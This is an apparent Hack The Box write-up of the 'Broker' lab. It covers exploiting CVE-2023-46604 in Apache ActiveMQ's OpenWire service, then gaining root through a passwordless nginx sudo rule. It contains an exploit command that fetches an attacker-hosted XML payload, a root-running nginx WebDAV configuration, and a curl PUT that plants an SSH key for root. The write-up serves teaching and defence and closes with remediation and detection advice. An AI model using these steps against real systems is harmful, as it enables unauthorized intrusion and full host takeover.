Broker — ActiveMQ OpenWire RCE and Unsafe Daemon Sudo
- Tools
- rustscan, nmap, sudo, nginx, ssh-keygen, curl, ssh
- Skill demonstrated
- Unauthenticated message-broker exploitation and daemon configuration abuse for privilege escalation
- Tags
At a glance
Section titled “At a glance”| Field | Value |
|---|---|
| Difficulty | Easy |
| Target environment | Linux (Ubuntu) running Apache ActiveMQ 5.15.15 |
| Starting position | Unauthenticated network access |
| Objective | Assess exposed ActiveMQ broker services and the privilege boundary available to the service account |
| Outcome | Service-account code execution and root SSH access via a passwordless nginx sudo rule |
Summary
Section titled “Summary”Broker is an Easy-rated Hack The Box Linux lab built around an Apache ActiveMQ 5.15.15 deployment. The OpenWire transport on 61616 is vulnerable to CVE-2023-46604, an unauthenticated remote code execution flaw in the OpenWire marshaller, while the management console accepted default credentials. Exploiting the marshaller returns code execution as the broker service account, and a passwordless sudo rule for the nginx binary allows a root-owned instance with WebDAV writes to place an SSH key for root. Credential values, target and attacker addresses, and payload specifics are replaced with role-based placeholders; command syntax is preserved.
Attack path: Unauthenticated OpenWire exploitation (CVE-2023-46604) → ActiveMQ service-account code execution → passwordless nginx sudo → root-owned WebDAV file write → root SSH access
Context and Objective
Section titled “Context and Objective”- Target: Linux (Ubuntu) host running Apache ActiveMQ 5.15.15.
- Exposed services: SSH (22), HTTP (80), MQTT (1883), AMQP (5672), management HTTP (8161), STOMP (61613), and OpenWire (61616).
- Starting position: unauthenticated network access, with no provided credentials.
- Objective: assess the exposed broker services and the privilege boundary available to the service account.
- Constraints: activity was confined to the Hack The Box lab environment.
Approach and Evidence
Section titled “Approach and Evidence”1. Service Enumeration
Section titled “1. Service Enumeration”Observation: a full TCP scan exposed SSH, HTTP, and a cluster of ActiveMQ messaging services.
rustscan -a <TARGET_IP> --ulimit 5000 -- -Pn -sC -sV -oN <SCAN_OUTPUT>Truncated scan output:
22/tcp open ssh OpenSSH 8.9p1 Ubuntu80/tcp open http nginx 1.18.08161/tcp open http Jetty 9.4.39.v2021032561613/tcp open stomp Apache ActiveMQ61616/tcp open apachemq ActiveMQ OpenWire transport 5.15.15Significance: the exposed ActiveMQ surface defines the attack path — management HTTP on 8161, STOMP on 61613, and OpenWire on 61616. The reported broker version, 5.15.15, falls in the range affected by CVE-2023-46604.
Result: SSH, HTTP, and multiple broker protocols are reachable, and ActiveMQ 5.15.15 is exposed on the OpenWire transport.
2. ActiveMQ OpenWire Exploitation (CVE-2023-46604)
Section titled “2. ActiveMQ OpenWire Exploitation (CVE-2023-46604)”Observation: ActiveMQ 5.15.15 is affected by CVE-2023-46604, an unauthenticated remote code execution flaw in the OpenWire marshaller that lets a client cause the broker to instantiate attacker-controlled Spring XML. The source records that the management console on 8161 also accepted default credentials; the console was not required for the exploit.
Action: a public CVE-2023-46604 OpenWire proof-of-concept was pointed at the target with an attacker-hosted XML payload.
python3 exploit.py -i <TARGET_IP> -p 61616 -u http://<ATTACKER_HOST>/<PAYLOAD_XML>The payload declares a java.lang.ProcessBuilder bean whose constructor argument is the command to run.
Output:
<SERVICE_ACCOUNT>@<HOST>:<SERVICE_DIR>$Significance: OpenWire is reachable without authentication, so the vulnerable marshaller yields code execution regardless of console access. The default console credentials were an independent exposure on the same host.
Result: code execution in the context of the ActiveMQ service account.
3. Sudo Privilege Analysis
Section titled “3. Sudo Privilege Analysis”Observation: the service account could query its own sudo policy.
sudo -lUser <SERVICE_ACCOUNT> may run the following commands on <HOST>: (ALL : ALL) NOPASSWD: /usr/sbin/nginxSignificance: the account may run the nginx binary as root without a password. Because nginx accepts a caller-supplied configuration file, this rule is equivalent to broad privileged execution.
Result: a passwordless sudo rule grants the service account the ability to start nginx as root.
4. Root File Write via nginx WebDAV
Section titled “4. Root File Write via nginx WebDAV”Observation: nginx configuration directives control worker identity, document root, and write-capable modules.
Action: a custom configuration ran workers as root and enabled HTTP PUT.
sudo /usr/sbin/nginx -c <CONFIG_PATH>Key configuration directives:
user root;http { server { listen 1339; root /; autoindex on; dav_methods PUT; }}An SSH key was generated and its public half written into root’s authorized keys over the WebDAV endpoint:
ssh-keygen -t ed25519 -f <KEY_NAME> -N ""curl -X PUT http://127.0.0.1:1339/root/.ssh/authorized_keys --data-binary @<KEY_NAME>.pubAuthentication as root then confirmed the escalated context:
ssh -i <KEY_NAME> root@<TARGET_IP>root@<HOST>:~# whoamirootSignificance: a root-owned nginx with WebDAV enabled is a controlled root file-write primitive; writing an SSH public key into root’s authorized_keys converts that write into root shell access.
Result: root command execution is confirmed by the whoami output.
Challenges and Decisions
Section titled “Challenges and Decisions”| Decision | Rationale |
|---|---|
| Target the unauthenticated OpenWire service rather than the management console | CVE-2023-46604 is reachable on port 61616 without console authentication; the default console credentials were a separate exposure not required for exploitation |
| Enable root workers and HTTP PUT in the nginx configuration | The sudo rule grants the daemon binary, and configuration directives control process identity and write behavior, producing a root file-write primitive |
Outcome
Section titled “Outcome”The evidence establishes unauthenticated code execution as the ActiveMQ service account through CVE-2023-46604, and root command execution through a passwordless nginx sudo rule abused to write an SSH key into root’s authorized_keys. The management console’s default credentials were a separate exposure and were not required for exploitation.
Lessons and Recommendations
Section titled “Lessons and Recommendations”Each finding pairs the observed root cause with its demonstrated impact and a prioritized action. The actions below are recommendations; they were not tested in the lab.
- Unauthenticated vulnerable OpenWire transport. CVE-2023-46604 is an unauthenticated code-execution flaw in the OpenWire marshaller, and it is reachable whenever port 61616 is exposed; exploitation yielded service-account code execution. Recommendation: upgrade or patch ActiveMQ and restrict 61616 to trusted networks, disabling OpenWire where it is not required. Detection: monitor the broker for unexpected class instantiation and unusual outbound connections initiated from the service account.
- Default management console credentials. The console accepted default credentials, granting authenticated management access independent of the exploit path. Recommendation: change default credentials and restrict the management interface to trusted administration networks.
- Passwordless sudo for a daemon binary. A
(ALL : ALL) NOPASSWD: /usr/sbin/nginxrule let the service account start the daemon as root, and configuration control turned that into broad privileged execution. Recommendation: remove sudo rules for general-purpose daemon binaries and use tightly scoped wrappers where privileged operations are necessary. Detection: alert on sudo rule changes and on nginx invoked with a non-standard configuration path. - Root-owned workers with WebDAV enabled. Running workers as root and permitting HTTP PUT produced a root file-write primitive, which was used to place an SSH key for root. Recommendation: run workers as an unprivileged user, avoid enabling WebDAV and directory indexing, and restrict write methods. Detection: monitor writes to sensitive paths such as
authorized_keys.
References
Section titled “References”- Hack The Box — Broker (retired machine)
- NVD — CVE-2023-46604 (Apache ActiveMQ OpenWire unauthenticated remote code execution)
- Apache ActiveMQ security advisory — CVE-2023-46604
- RustScan
- Nmap Reference Guide
- sudoers manual — sudo.ws
- nginx command-line switches
- nginx
ngx_http_dav_module - curl manual page
ssh-keygen— OpenBSD manualsshd— OpenBSD manual